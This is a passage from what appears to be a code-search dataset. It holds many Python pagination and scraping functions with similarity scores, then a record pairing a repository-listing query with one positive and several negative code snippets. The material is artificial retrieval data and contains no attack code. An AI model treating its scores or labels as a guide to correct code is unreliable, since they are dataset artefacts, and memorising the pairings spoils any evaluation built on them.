self._api.router.publication['search'].format(\n project_id=self.project_id\n )\n res_data = self._api.post(url, data=self.search_param)\n self.total = res_data['total']\n self._items = (\n Publication(item, self.project_id)\n for item in res_data['hits']\n )\n div = self.total // self.search_param['limit']\n reste = self.total % self.search_param['limit']\n self.total_page = div\n if reste != 0: self.total_page += 1\n self.search_param = self.search_param.next_page()", "def page22(self):\n self.token_mid = \\\n '8'\n result = request2201.GET('/Cars_Sample_App/cars.do' +\n '?query=' +\n self.token_query +\n '&mid=' +\n self.token_mid)\n\n return result", "def read_all_pages(self, url):\n\n result = []\n next_token = ''\n token_param = '&startToken=' if '?' in url else '?startToken='\n\n while True:\n paginated_url = url + token_param + next_token\n response = self.http_client.get(paginated_url)\n if response.status_code != 200:\n raise BackendException(\"Pagination failed with status=%s on \"\n \"URL=%s\" % (response.status_code, url))\n\n parsed = response.json()\n if 'data' in parsed and len(parsed['data']) > 0:\n result.extend(parsed['data'])\n else:\n break\n\n # Do not make another HTTP request if everything is here already\n if len(result) >= parsed['count']:\n break\n\n if 'nextToken' not in parsed:\n break\n next_token = parsed['nextToken']\n\n return result", "def page9(self):\n result = request901.GET('/Cars_Sample_App/car.do' +\n '?query=' +\n self.token_query +\n '&cid=' +\n self.token_cid)\n\n return result", "def get_page(self, page: int = 1, page_size: int = 10) -> List[List]:\n assert isinstance(page, int) and page > 0\n assert isinstance(page_size, int) and page_size > 0\n\n range = index_range(page, page_size)\n self.dataset()\n return self.__dataset[range[0]: range[1]]", "def get_all(self, start_at, limit, order=None):", "def _get_objects_for_page(self, page_number):\n start, end = self._calculate_index(page_number, self.per_page, self.objects_count)\n return self._slice_objects(start, end)", "def page24(self):\n self.token_mid = \\\n '7'\n result = request2401.GET('/Cars_Sample_App/cars.do' +\n '?query=' +\n self.token_query +\n '&mid=' +\n self.token_mid)\n self.token_query = \\\n httpUtilities.valueFromBodyURI('query') # 'car'\n # 6 different values for token_cid found in response, using the first one.\n self.token_cid = \\\n httpUtilities.valueFromBodyURI('cid') # '20'\n\n return result", "def page8(self):\n result = request801.GET('/Cars_Sample_App/car.do' +\n '?query=' +\n self.token_query +\n '&cid=' +\n self.token_cid)\n self.token_carName = \\\n httpUtilities.valueFromBodyURI('carName') # 'S'\n self.token_query = \\\n httpUtilities.valueFromBodyURI('query') # 'carEnquiries'\n\n return result", "def retrieving_data():\n for x in range(1):\n page_number=random.randint(1,500)\n page_num=str(page_number)\n url = 'http://www.tastespotting.com/browse/'+page_num\n req = http.request('GET', url)\n data = BeautifulSoup(req.data,'html.parser')\n for each_div in data.find_all(\"div\", { \"class\": \"trendspotted-item\"}):\n for each_recipe in each_div.find_all('a', href=True):\n \"\"\"links starting with /clicks are the links of recipe to their original sites, so just retrieve those links\"\"\"\n if each_recipe['href'].startswith('/click'):\n retrieving_data.recipe_link=each_recipe['href'][16:-12]\n for each_img in each_recipe.find_all('img', alt=True):\n retrieving_data.recipe_image=each_img['src']\n for each_caption in each_div.find(\"p\", { \"class\": \"photo_caption\"}):\n retrieving_data.recipe_title=each_caption", "def page20(self):\n result = request2001.GET('/Cars_Sample_App/car.do' +\n '?query=' +\n self.token_query +\n '&cid=' +\n self.token_cid, None,\n ( NVPair('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),\n NVPair('Referer', 'http://supercars-tomcat:8080/Cars_Sample_App/car.do?query=car&cid=26'), ))\n\n return result", "def page10(self):\n result = request1001.GET('/Cars_Sample_App/search.do', None,\n ( NVPair('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),\n NVPair('Referer', 'http://supercars-tomcat:8080/Cars_Sample_App/car.do?query=carEnquiries&cid=2'), ))\n\n return result", "def get_pages_data(title: str) -> dict: \n data_object = layout_data.objects.get(title = title)\n data = {\n 'title': data_object.title,\n 'main_consistion' : data_object.main_consistion,\n 'list_of_links' : data_object.data['link'][:3],\n 'main_consistion_2' : data_object.main_consistion_2,\n 'list_of_links_2' : data_object.data['link'][3:]\n }\n return data", "def chunk(self, count):\n page = 1\n results = self.for_page(page, count).get()\n\n while len(results) > 0:\n yield results\n\n page += 1\n\n results = self.for_page(page, count).get()", "def fetch_all_pages(self,query, params=None, headers=None):\n r = requests.get(query, params=params, headers=headers )\n if not r.ok:\n raise(Exception(\"Error in fetch_all_pages\", \"query : \", query, \"r.json() \", r.json()))\n link = r.headers.get('link', None)\n if link is None:\n return r.json()\n\n if 'rel=\"next\"' not in link:\n return r.json()\n else:\n next_url = None\n for url in link.split(','):\n if 'rel=\"next\"' in url:\n next_url = url.split(';')[0][1:-1]\n\n return r.json() + self.fetch_all_pages(next_url, params=params, headers=headers)", "def get_overview_pages(self):\n self.load_website()\n maxNumber = 1\n for pageIndex in self.soup.find_all('div', {'class':'paginate bg-muted'}):\n for link in pageIndex.find_all('a'):\n # try to convert string to number; if error it's not a number\n try:\n number = int(link.text)\n if number > maxNumber:\n maxNumber = number \n except ValueError:\n pass\n print('Screening complete: %d pages found - accessing first %s pages' % (maxNumber, self.maxPages))\n self.pages = [np.arange(1, maxNumber, 1)]", "def paginated_call(self) -> global___Snippet.ClientCall:", "def paginate():\n pg_nums = 1\n while True:\n try:\n print(_base_url.format(pg_nums))\n r = requests.get(_base_url.format(pg_nums),\n headers=headers)\n # Anti blocking delay\n time.sleep(random.randint(5, 10))\n if r.status_code != 200:\n raise Exception(\"Wrong Response\")\n depts = scrape(r.content)\n if depts.empty:\n raise Exception(\"No more departments\")\n except Exception as e:\n print(e)\n print('Finishing to retrieve info.')\n break\n # Store values\n save(depts)\n pg_nums += 1\n return pg_nums", "def GatherPageData(self, mr):\n # TODO(jrobbins): Allow deep-linking into this page.\n canned_query_views = []\n if mr.project_id:\n with mr.profiler.Phase('getting canned queries'):\n canned_queries = self.services.features.GetCannedQueriesByProjectID(\n mr.cnxn, mr.project_id)\n canned_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(canned_queries)]\n\n saved_query_views = []\n if mr.auth.user_id and self.services.features:\n with mr.profiler.Phase('getting saved queries'):\n saved_queries = self.services.features.GetSavedQueriesByUserID(\n mr.cnxn, mr.me_user_id)\n saved_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(saved_queries)\n if (mr.project_id in sq.executes_in_project_ids or\n not mr.project_id)]\n\n return {\n 'issue_tab_mode': 'issueAdvSearch',\n 'page_perms': self.MakePagePerms(mr, None, permissions.CREATE_ISSUE),\n 'canned_queries': canned_query_views,\n 'saved_queries': saved_query_views,\n }", "def extract_page_urls(self, _):\n url = \"https://mossadams.taleo.net/careersection/rest/jobboard/searchjobs?lang=en&portal=4160751617\"\n page_num = 1\n last_count = 0\n this_count = 0\n\n while True:\n last_count = len(self.urls_to_scrape)\n payload = PAYLOAD + '\"pageNo\":' + str(page_num) + \"}\"\n json_data = self.post_request(url, out_format='json', headers=HEADERS, data=payload)\n\n for job in json_data['requisitionList']:\n job_url = \"https://mossadams.taleo.net/careersection/6/jobdetail.ftl?job=\" + job['contestNo']\n self.urls_to_scrape.add(job_url)\n\n # check to see if any new records were scraped; if not, I've reach the end\n this_count = len(self.urls_to_scrape)\n if last_count == this_count:\n break\n else:\n last_count = this_count\n page_num += 1", "def _retrieve_data(keyw, limit, page=1):\n # Max results per page is 100\n per_page = limit if limit < 100 else 100\n url = BASE_URL + QUALIFIERS % (keyw, per_page, page)\n\n req = requests.get(url)\n r_json = req.json()\n\n if limit > 100:\n r_json['items'].extend(_retrieve_data(keyw, limit - 100, page + 1).\n get('items', []))\n\n return r_json", "def GatherPageData(self, mr):\n raise MethodNotSupportedError()", "def rest_get_pages(self, url, payload={}, total=None):\n responses = []\n response = self.get(url, payload)\n response_json = response.json()\n logging.debug(\"Getting page 1: %s\" % (url))\n\n pm_total_pages = self.paginatation_map.get(\"field_name_total_pages\")\n total_pages = response_json[pm_total_pages]\n for page in range(2, total_pages + 1):\n current_object_total = len(response_json[self.paginatation_map.get(\"field_name_data\")])\n if total and current_object_total >= total:\n logging.debug(\"Got %s items of limit %s, finishing paginiation\" % (current_object_total, total))\n break\n\n logging.debug(\"Getting page %s of %s: %s\" % (page, total_pages, url))\n payload[self.paginatation_map.get(\"field_name_page\")] = page\n response = self.get(url, payload=payload)\n if response.status_code not in [200]:\n logging.warning(\"Could not get page %s: <%s> %s\" % (page, response.status_code, response.text))\n break\n next_page_json = response.json()\n\n response_json[self.paginatation_map.get(\"field_name_data\")] += \\\n next_page_json[self.paginatation_map.get(\"field_name_data\")]\n page += 1\n\n return {\n \"responses\": responses,\n \"data\": response_json\n }", "def paginate(self, *args, **kwargs):\n result = {}\n result.update(self.get_paginate_data(*args, **kwargs))\n result.update(self.get_objects_data())\n return result", "def get_all_data_from_main_table(soup_list):\n year_growth_list_all_pages = []\n\n for i in soup_list:\n year_growth_list_all_pages.append(get_data_from_main_table(i))\n return year_growth_list_all_pages", "def _fetch_in_bulk(self, func_name, page_range, **func_args):\n all_results = []\n prog_bar = None\n\n if 'page_num' in func_args:\n func_args = func_args.pop('page_num')\n\n if self.profile.use_prog_bar:\n try:\n max_val = (max(page_range) + 1)\n except ValueError:\n max_val = 1\n\n prog_bar = progressbar.ProgressBar(max_value=max_val)\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=self.profile.num_thread_workers) as executor:\n counter = 1\n future_to_page = {executor.submit(func_name, page_num=page, **func_args): page for page in page_range}\n\n for future in concurrent.futures.as_completed(future_to_page):\n try:\n data = future.result()\n except PageSizeError:\n raise\n except RequestFailed:\n continue\n\n if 'content' in data:\n items = data['content']\n for item in items:\n all_results.append(item)\n\n if self.profile.use_prog_bar:\n prog_bar.update(counter)\n time.sleep(0.1)\n counter += 1\n\n if self.profile.use_prog_bar:\n prog_bar.finish()\n\n return all_results", "def test_pagination(self):\n for page in range(1, 5):\n self._test_one_page(page=page)", "def load_paginated(per_page=25, page_num=1):\n def item_from_entity(entity):\n return {\n 'id': entity.id,\n 'partner_code': entity.partner.partner_code,\n 'added_at': entity.date_time.strftime(\n utils.FORMAT_US_DATE_TIME)\n }\n\n pagination = LinkageEntity.query.paginate(page_num, per_page, False)\n items = map(item_from_entity, pagination.items)\n return items, pagination.pages", "def _get_post_page_list(self, url, page, count):\n params = {'page': page, 'per_page': count}\n items = self._make_request(url, params)\n return items", "def scrape_central(page):\n soup = BeautifulSoup(page, 'html.parser')\n table = soup.find(\"table\", {\"class\" : \"ez1\"})\n rows = table.findAll('tr')\n page = int(table.find('tr', {'class': 'black'}).span.text)\n\n data_page = []\n for row in rows[1:]:\n item = {}\n cols = row.findAll('td')\n\n if len(cols) == 38:\n item['page'] = page\n item['state'] = cols[14].text.strip()\n item['district'] = cols[17].text.strip()\n item['village'] = cols[20].text.strip()\n item['proponent'] = cols[35].text.strip()\n item['proposal_no'] = cols[4].text.strip()\n item['file_no'] = cols[7].text.strip()\n item['proposal_name'] = cols[10].text.strip()\n item['sector'] = cols[34].text.strip()\n item['date_tor_apply'] = cols[24].text.strip()\n item['date_tor_granted'] = cols[27].text.strip()\n item['date_ec_receipt'] = cols[24].text.strip()\n item['date_ec_granted'] = cols[33].text.strip()\n clearance = cols[37].findAll('img', {'src': 'images/ec.png'})\n tor = cols[37].findAll('img', {'src': 'images/tor.png'})\n pfr = cols[37].findAll('img', {'src': 'images/pfr.png'})\n forms = cols[37].findAll('img', {'src': 'images/forms.png'})\n com = cols[37].findAll('img', {'src': 'images/com.png'})\n mon = cols[37].findAll('img', {'src': 'images/mon.png'})\n add = cols[37].findAll('img', {'src': 'images/add.png'})\n item['clearance_report'] = len(clearance)\n item['tor_report'] = len(tor)\n item['pf_report'] = len(pfr)\n item['form1'] = len(forms)\n item['compliance_report'] = len(com)\n item['monitor_report'] = len(mon)\n item['additional_report'] = len(add)\n data_page.append(item)\n \n\n if len(cols) == 29:\n item['page'] = page\n item['state'] = cols[14].text.strip()\n item['district'] = cols[17].text.strip()\n item['village'] = cols[20].text.strip()\n item['proponent'] = cols[26].text.strip()\n item['proposal_no'] = cols[4].text.strip()\n item['file_no'] = cols[7].text.strip()\n item['proposal_name'] = cols[10].text.strip()\n item['sector'] = cols[25].text.strip()\n item['date_tor_apply'] = None\n item['date_tor_granted'] = None\n item['date_ec_receipt'] = None\n item['date_ec_granted'] = cols[24].text.strip()\n clearance = cols[28].findAll('img', {'src': 'images/ec.png'})\n tor = cols[28].findAll('img', {'src': 'images/tor.png'})\n pfr = cols[28].findAll('img', {'src': 'images/pfr.png'})\n forms = cols[28].findAll('img', {'src': 'images/forms.png'})\n com = cols[28].findAll('img', {'src': 'images/com.png'})\n mon = cols[28].findAll('img', {'src': 'images/mon.png'})\n add = cols[28].findAll('img', {'src': 'images/add.png'})\n item['clearance_report'] = len(clearance)\n item['tor_report'] = len(tor)\n item['pf_report'] = len(pfr)\n item['form1'] = len(forms)\n item['compliance_report'] = len(com)\n item['monitor_report'] = len(mon)\n item['additional_report'] = len(add)\n data_page.append(item)\n \n return data_page", "def get_hyper(self, page: int = 1, page_size: int = 10) -> List[List]:\n getPage = self.get_page(page, page_size)\n allPages = math.ceil(len(self.dataset()) / page_size)\n hyperDict = {\n 'page_size': len(getPage),\n 'page': page,\n 'data': getPage,\n 'next_page': page + 1 if page < allPages else None,\n 'prev_page': page - 1 if page > 1 else None,\n 'total_pages': allPages\n }\n return hyperDict", "def get_images(self, page_number):", "def __get_all_pages(endpoint, query_params=None, log_msg=\"\"):\n query_params = query_params or {}\n resources = []\n page_num = 1\n while True:\n params = {\"results-per-page\": 100, \"page\": page_num}\n params.update(query_params)\n response = HttpClientFactory.get(CloudFoundryConfigurationProvider.get()).request(\n method=HttpMethod.GET,\n path=endpoint,\n params=params,\n msg=\"{} page {}\".format(log_msg, page_num),\n )\n resources.extend(response[\"resources\"])\n if page_num == response[\"total_pages\"]:\n break\n page_num += 1\n return resources", "def get_all(self, endpoint, params=None):\n merged_json = []\n\n # Continue fetching pages until we reach an empty one. GitHub doesn't return a count of the total number of\n # pages, so there's no alternative.\n page = 1\n get_next_page = True\n while get_next_page:\n json = self.get(endpoint, page, params)\n merged_json += json\n if not len(json) > 0:\n get_next_page = False\n page += 1\n\n return merged_json", "def _paginate(self) -> Iterable[List[str]]:\n req = self.html\n videos_lens = self._extractor(req)\n yield videos_lens # yielding doesn't mean that is the end\n\n # The above only returns 100 or fewer links\n # as Youtube loads 100 videos at a time\n # Simulating a browser request for the load more link\n load_more_url = self._find_load_more_url(req)\n\n while load_more_url: # there is an url found\n req = get(load_more_url)\n load_more = json.loads(req)\n try:\n html = load_more[\"content_html\"]\n except KeyError:\n return # if there is no content_html there is no chanch to find_load_more_url\n videos_lens = self._extractor(html)\n yield videos_lens\n\n load_more_url = self._find_load_more_url(\n load_more[\"load_more_widget_html\"],\n )\n\n return", "def get_all_page(url: str) -> list:\n url_book = get_url_book(url)\n return url_book", "def __aux_search(self, url, page_limit):\n info = list()\n count = 1\n while True:\n try:\n print(\"[+] Getting page {} result\".format(count))\n if page_limit >= count:\n jdata, response = get_response(url, apikey=self.apikey, params=self.params)\n count += 1\n if jdata and 'data' in jdata:\n info += jdata['data']\n if response and jdata.get('links', {}).get('next', '') != response.url:\n url = jdata['links']['next']\n else:\n break\n else:\n break\n except Exception as e:\n print(e)\n count += 1\n if page_limit >= count:\n break\n\n return info", "def _all_pages(self, page_function, **kwargs) -> Iterator[Iterable]:\n\n next_token = None\n is_truncated = True\n while is_truncated:\n page = page_function(token=next_token, **kwargs)\n next_token = page.next_token\n is_truncated = page.is_truncated and next_token is not None\n for task in page.page_data:\n yield task", "def get_all_records(self, data: dict, execution_context: dict):", "def paginate(self, data):\n page = self.request.GET.get('page', None)\n if page:\n return self.paginate_data(data, page)\n\n return data, {}", "def pageDoctors():\n page = request.args.get('draw', 1, int)\n total = Doctor.count()\n\n return jsonify(data = [doctor.serialize() for doctor in Doctor.page(page, 10, Doctor.firstName, Doctor.lastName)]\n , draw = page\n , recordsFiltered = total\n , recordsTotal = total)", "def _collect_results(self, request_method, request_args, request_kwargs={}, request_params={}):\n results = []\n cursor = None\n page_params = copy.copy(request_params)\n\n while True:\n if cursor:\n page_params['cursor'] = cursor\n response = request_method(\n *request_args,\n **request_kwargs,\n params=page_params\n )\n _raise_on_error(response)\n response_json = response.json()\n results.extend(response_json['results'])\n if response_json['next']:\n cursor = get_cursor_from_url(response_json['next'])\n else:\n return results", "def do_get_multi_page(self, additional_url, additional_headers=None, limit=None, filter_system_defined=True):\n offset = 0\n item_count = 0\n result_list = []\n while True:\n result = self.do_get_single_page(additional_url,\n additional_headers=additional_headers, \n limit=limit, \n offset=offset)\n paging = result['paging']\n items = result['items']\n item_count += len(items)\n offset += len(items)\n result_list.extend(items)\n if item_count == paging['count'] or len(items) == 0:\n break\n if filter_system_defined:\n result_list = [x for x in result_list if 'isSystemDefined' not in x or x['isSystemDefined'] == False]\n return result_list", "def page26(self):\n self.token_mid = \\\n '1'\n result = request2601.GET('/Cars_Sample_App/cars.do' +\n '?query=' +\n self.token_query +\n '&mid=' +\n self.token_mid)\n\n return result", "def get_dfs(npages=927):\n print(\"loading data\")\n try:\n os.makedirs('./data')\n except FileExistsError:\n pass\n\n def fp(pagenum): return './data/%s.csv' % pagenum\n\n dfs = (c(\n pagenum,\n get_page,\n parse_html_table(pagenum, fp(pagenum)),\n ) if not exists(fp(pagenum)) else pd.read_csv(fp(pagenum))\n for pagenum in range(1, npages)\n )\n\n df = pd.concat(dfs)\n return df", "def fetch_data(self):", "def page25(self):\n result = request2501.GET('/Cars_Sample_App/supercars.do', None,\n ( NVPair('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),\n NVPair('Referer', 'http://supercars-tomcat:8080/Cars_Sample_App/cars.do?query=manu&mid=7'), ))\n self.token_query = \\\n httpUtilities.valueFromBodyURI('query') # 'manu'\n # 15 different values for token_mid found in response, using the first one.\n self.token_mid = \\\n httpUtilities.valueFromBodyURI('mid') # '3'\n\n return result", "def page20(self):\n self.token_target = \\\n 'POJOCache'\n result = request2001.GET('/clusterinfo-web/controller' +\n '?target=' +\n self.token_target +\n '&mode=' +\n self.token_mode)\n # 10 different values for token_target found in response, using the first one.\n self.token_target = \\\n httpUtilities.valueFromHiddenInput('target') # 'AllClusterState'\n\n return result", "def get_details(page, dataWriter):\n nextPage = True\n pageNo = 1\n while (nextPage and pageNo <= 5):\n response = read_url(page + 'page/' + str(pageNo))\n soup = BeautifulSoup(response, 'lxml')\n\n rows = soup.find_all('div', 'quote')\n if (len(rows) > 0):\n print(\"Page \",pageNo,\" Total Quotes Found \",len(rows))\n for row in rows:\n if row.find('span',attrs={'itemprop':'text'}):\n\n title = row.find(attrs={'itemprop':'text'}).text.strip()\n author = row.find(attrs={'itemprop':'author'}).text.strip()\n authorLink = row.find('a',href=re.compile(r'/author/')).get('href')\n tags = row.find('div','tags').find(itemprop=\"keywords\").get('content')\n print(title, ' : ', author,' : ',authorLink, ' : ',tags)\n\n if authorLink:\n authorLink = 'http://quotes.toscrape.com' + authorLink\n linkDetail = read_url(authorLink)\n soupInner = BeautifulSoup(linkDetail, 'lxml')\n\n born_date = soupInner.find('span','author-born-date').text.strip()\n born_location = soupInner.find('span','author-born-location').text.strip()\n\n # Write a list of values in file\n dataWriter.writerow([tags,authorLink,author,born_date,born_location.replace('in ',''),title])\n\n nextPage = True\n pageNo += 1\n else:\n print(\"Quotes Not Listed!\")", "def retrieve_data():\r\n\r\n print(\"\\n[i] Running scheduled query for page {} at {}.\".format(page, ut.get_time()))\r\n # Instanciating main class for Facebook call\r\n fbs = FacebookScrapper()\r\n\r\n # Getting hourly data from Facebook\r\n data = fbs.get_page_fan_count(page=page)\r\n\r\n # Sending data to database\r\n dba.insert_data_db(data)", "def process(self):\n data = getattr(self, self.request.method.lower())()\n data, pagination = self.paginate(data)\n return data, pagination", "def create_page_objects(self, data):\n for page in data['pages']:\n self.create_page(page)", "def get_paginate_data(self, limit=10, offset=0, count=None):\n return dict(limit=limit, offset=offset, count=count)", "def page19(self):\n self.token_cid = \\\n '26'\n result = request1901.GET('/Cars_Sample_App/car.do' +\n '?query=' +\n self.token_query +\n '&cid=' +\n self.token_cid)\n self.token_car = \\\n httpUtilities.valueFromBodyURI('car') # '26'\n self.token_carName = \\\n httpUtilities.valueFromBodyURI('carName') # 's'\n self.token_query = \\\n httpUtilities.valueFromBodyURI('query') # 'carEnquiries'\n\n return result", "def gather_all_profiles(year, month):\n page = 1\n urls = []\n\n print(\"{}-{} : Begin indexing.\".format(year, month))\n\n while (page > 0):\n urlstring = \"http://scamdigger.com/{}/{}/page/{}\".format(year,month,page) \n jitter = random.choice([0,1])\n try:\n urlhandle = urlopen(urlstring)\n urls += enumerate_profiles(urlhandle, page)\n # time.sleep(1+jitter)\n page += 1\n except:\n page = 0\n\n print(\"{}-{} : {} profiles\".format(year,month,len(urls)))\n\n for url in urls:\n uid = url[30:-1]\n outfile=PROFILES+os.sep+uid+'.json'\n jitter = random.choice([0,1])\n try:\n urlhandle = urlopen(url)\n scrape_profile(urlhandle, outfile, year, month)\n # time.sleep(1+jitter)\n except Exception as e:\n print(\"Exception when handling {}\".format(url))\n print(e)\n \n print(\"{}-{} : complete.\".format(year,month))", "def get_events(self):\n\n url = '/v2.4/'+self.page_id+'/events'\n data = self.graph.request(url)\n\n while 'next' in data['paging'].keys():\n print data['paging']['next']\n data = self.graph.request(url, args={\n 'limit' : 100,\n 'after' : data['paging']['cursors']['after']\n })\n\n return data", "def per_page_statements(self) -> google.protobuf.internal.containers.RepeatedCompositeFieldContainer[global___Statement]:", "def per_page():\n return 100", "def list(self, request ):\n\t\tinUrl = request.query_params.get('url', None )\n\t\t#if inUrl is None:\n\t\t#\tinUrl = 'https://google.com'\n\t\tserializer = PageInfoSerializer( instance = PageInfo(url=inUrl), many=False )\n\t\treturn Response( serializer.data )", "def get_table_data(table_name, query, pages, table_columns, headers, base_url, maxpagesize):\n\n\n logging.info(\"Running get_table_data() . . . \")\n table_data = []\n for p in range(pages):\n page_number = p + 1\n\n #print('\\tGetting page number {}'.format(page_number))\n #print(\"Running TEST MESSAGE . . . \")\n\n endpoint = '{0}/ws/schema/table/{1}?{2}page={3}&pagesize={4}&projection={5}'.format(base_url, table_name, query, page_number, maxpagesize, table_columns)\n r_data = requests.get(endpoint, headers=headers)\n\n if r_data.ok:\n data_json = r_data.json()\n records = data_json['record']\n for r in records:\n table_data.append(r['tables'][table_name])\n else:\n logging.info(r_data.text)\n raise Exception(r_data.text)\n\n return table_data", "def construct_page_requests(key, max_pages, rank, tid):\n template = lambda i : f\"https://search.bilibili.com/all?keyword={key}&from_source=nav_search_new&order={rank}&duration=0&tids_1={tid}&page={i}\"\n return [template(i) for i in range(1, max_pages+1)]", "def __call__(self):\r\n self.init_data = td.import_data(self.__module__)\r\n self.page1() # GET navigation (requests 101-153)\r\n\r\n grinder.sleep(20)\r\n self.page2() # GET case (requests 201-252)\r\n\r\n grinder.sleep(20)\r\n self.page3() # GET view (requests 301-365)\r\n\r\n grinder.sleep(20)\r\n self.page4() # POST view (requests 401-452)\r", "def data_for_all(request):\n data = common_data(request)\n data.update({\"tags\": Tag.used_tags(),\n \"archive_qualifier\": \"\",\n \"recent_active_months\": Blog.recent_active_months()})\n return data", "def parsing_all_page(url):\n html_doc = get_html(url)\n# html_doc = get_html_local()\n page_count = get_html_count(html_doc)\n print 'All have find pages %d' % page_count\n\n projects = []\n\n for page in range(1, page_count + 1):\n print 'Parsing %d%%' % (page*100/page_count)\n\n url = BASE_URL + '?page=%d' % page\n projects.extend(process_page(url))\n\n return projects", "def get_pages(search_url):\n page_number = 1\n page = fetch_page(search_url.format(page_number))\n while (page_exists(page)) & (page_number <= 100):\n print (page_number, end=', ')\n yield page, page_number\n page_number += 1\n page = fetch_page(search_url.format(page_number))" ]
[ "0.75263435", "0.739832", "0.69225633", "0.6902741", "0.6879651", "0.68711656", "0.6810762", "0.67072725", "0.67072725", "0.6681827", "0.66562927", "0.66062623", "0.65945363", "0.6549788", "0.6540712", "0.6535249", "0.6503686", "0.64717466", "0.6464984", "0.6408598", "0.6399189", "0.6398991", "0.6391671", "0.63719743", "0.6354179", "0.6350053", "0.63374406", "0.63287824", "0.63205177", "0.62652373", "0.6255962", "0.6251244", "0.6222947", "0.6215729", "0.62153184", "0.62085146", "0.6197093", "0.61964434", "0.61963195", "0.6189457", "0.6187812", "0.6178874", "0.6178697", "0.6163625", "0.6157757", "0.61508447", "0.6148727", "0.6138722", "0.61312574", "0.6124496", "0.6117256", "0.61113286", "0.61083186", "0.6107078", "0.61007696", "0.6083239", "0.60765487", "0.6075993", "0.6049417", "0.6023039", "0.6007502", "0.60061073", "0.600225", "0.5993922", "0.59836245", "0.5982952", "0.5972466", "0.5963239", "0.59614754", "0.5960375", "0.59455085", "0.59422106", "0.5941502", "0.59389645", "0.5917478", "0.5916766", "0.590178", "0.5895737", "0.58890533", "0.5869547", "0.58572185", "0.5855334", "0.5852604", "0.58504593", "0.58501655", "0.5850159", "0.5850073", "0.5846759", "0.5837006", "0.58219916", "0.581715", "0.5816785", "0.58165425", "0.5816456", "0.5814322", "0.5811134", "0.58079517", "0.5807011", "0.58044255", "0.580344" ]
0.638738
23
Get list of names of accessible repositories (including owner)
def list_repositories(self): data = self._get_all_data('/user/repos') return [repo['full_name'] for repo in data]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def repositories(self, user_name=None):\n user_name = user_name if user_name else self._auth[0]\n data = self._request('GET', 'users', user_name)\n return data.repositories\n #ret_val = []\n #for repository in data.repositories:\n # ret_val.append(repository.name)\n # #print 'repo', repository['name'] # can use as dict or as object\n #return ret_val", "def listRepositories(self):\n return self.mini_catalog.listRepositories()", "def query_repos(self):\n return [self.config[\"repo\"]]", "def do_list(client, args):\n\trepos = client.repos.list(args.user)\n\tprint '%s has the following repositories:' % args.user\n\tprint 'Name - Description'\n\tfor repo in repos:\n\t\tprint '%s - %s' % (repo.name, repo.description)", "def list_public_repos():\n return Collaborator.objects.filter(user__username=settings.PUBLIC_ROLE)", "def list_repositories(self):\n repos = self.repo_conn.list_repositories()\n return repos", "def _get_repo_list(self, *args, **kwargs): \r\n repo_list = kwargs['repositories'] if kwargs.get('repositories', None) else self.get_list(\r\n api_endpoint=settings.GITHUB_SETTINGS['GITHUB_USER_REPO_API'].format(**kwargs), **kwargs\r\n )\r\n for r in repo_list:\r\n if isinstance(r, dict):\r\n yield r['name']\r\n else:\r\n yield r", "def get_repos():\n response = requests.get('https://quay.io/api/v1/repository?public=true&namespace=ucsc_cgl')\n repo_data = json.loads(response.text)\n assert response.status_code == 200, 'Quay.io API request to view repositories failed.'\n repos = {str(x[u'name']) for x in repo_data['repositories']}\n return repos", "def do_repo_list(self):\n return StringResult(self._repo_list.format_available_repos())", "def list_repos(self):\n return sorted(self.user_con.list_repos())", "def get_repos():\n\n return __do_get_repos()", "def repo_list(self):\n\n data, _ = self.helm_client.repo_list()\n return data", "def get_repositories(self):\n \n endpoint = 'repositories'\n parameters = [('pagelen', '100')]\n \n if len(self.organization):\n endpoint += f'/{self.organization}' \n parameters.append(('role', 'contributor')) \n else: \n parameters.append(('role', 'owner'))\n \n repositories_raw_data = self.__request_api(f'{self.base_url}{endpoint}?{urllib.parse.urlencode(parameters)}', method='GET')\n repositories = []\n has_next_page = True\n \n while has_next_page:\n for datum in repositories_raw_data['values']:\n clone_url = None\n for link in datum['links']['clone']:\n if link['name'] == 'ssh':\n clone_url = link['href']\n break\n \n project_name = None\n if \"name\" in datum['project']:\n project_name = datum['project']['name']\n \n repositories.append(VcsRepository(datum['slug'], datum['description'], clone_url, datum['is_private'], project_name))\n \n has_next_page = \"next\" in repositories_raw_data\n \n if has_next_page: \n repositories_raw_data = self.__request_api(repositories_raw_data[\"next\"], method='GET')\n\n return repositories", "def list_ambari_managed_repos(stack_name):\n stack_name = stack_name.upper()\n # TODO : get it dynamically from the server\n repository_names = [stack_name, stack_name + \"-UTILS\" ]\n if OSCheck.is_ubuntu_family():\n repo_dir = '/etc/apt/sources.list.d/'\n elif OSCheck.is_redhat_family(): # Centos/RHEL 5/6\n repo_dir = '/etc/yum.repos.d/'\n elif OSCheck.is_suse_family():\n repo_dir = '/etc/zypp/repos.d/'\n else:\n raise Fail('Can not dermine repo dir')\n repos = []\n for name in repository_names:\n # List all files that match pattern\n files = glob.glob(os.path.join(repo_dir, name) + '*')\n for f in files:\n filename = os.path.basename(f)\n # leave out extension\n reponame = os.path.splitext(filename)[0]\n repos.append(reponame)\n # get uniq strings\n seen = set()\n uniq = [s for s in repos if not (s in seen or seen.add(s))]\n return uniq", "def list_ecr_repositories():\n repositories = ECS_MANAGER.list_ecr_repositories()\n\n if repositories:\n print(str_sep)\n print(\"Listing repositories available in {}\".format(SESSION.region_name.upper()))\n print(\"{:30}{:60}\".format('NAME', 'URI'))\n print(str_sep)\n\n for rep in repositories['repositories']:\n print(\"{:30}{:60}\".format(rep['repositoryName'], rep['repositoryUri']))", "def get_repositories(self):\n if not self.parentpath or not os.path.exists(self.parentpath):\n return []\n repos = os.listdir(self.parentpath)\n reponames = {}\n for name in repos:\n dir = os.path.join(self.parentpath, name)\n \n command = self.admin + ' verify \"%s\"' % dir\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n (result, error) = process.communicate()\n \n rev = result[result.rfind('revision') + 9:len(result) - 2]\n displayrev = rev\n if rev == '0':\n rev = ''\n displayrev = ''\n reponames[name] = {\n 'dir': dir,\n 'rev': rev,\n 'display_rev': displayrev\n }\n return reponames.iteritems()", "def 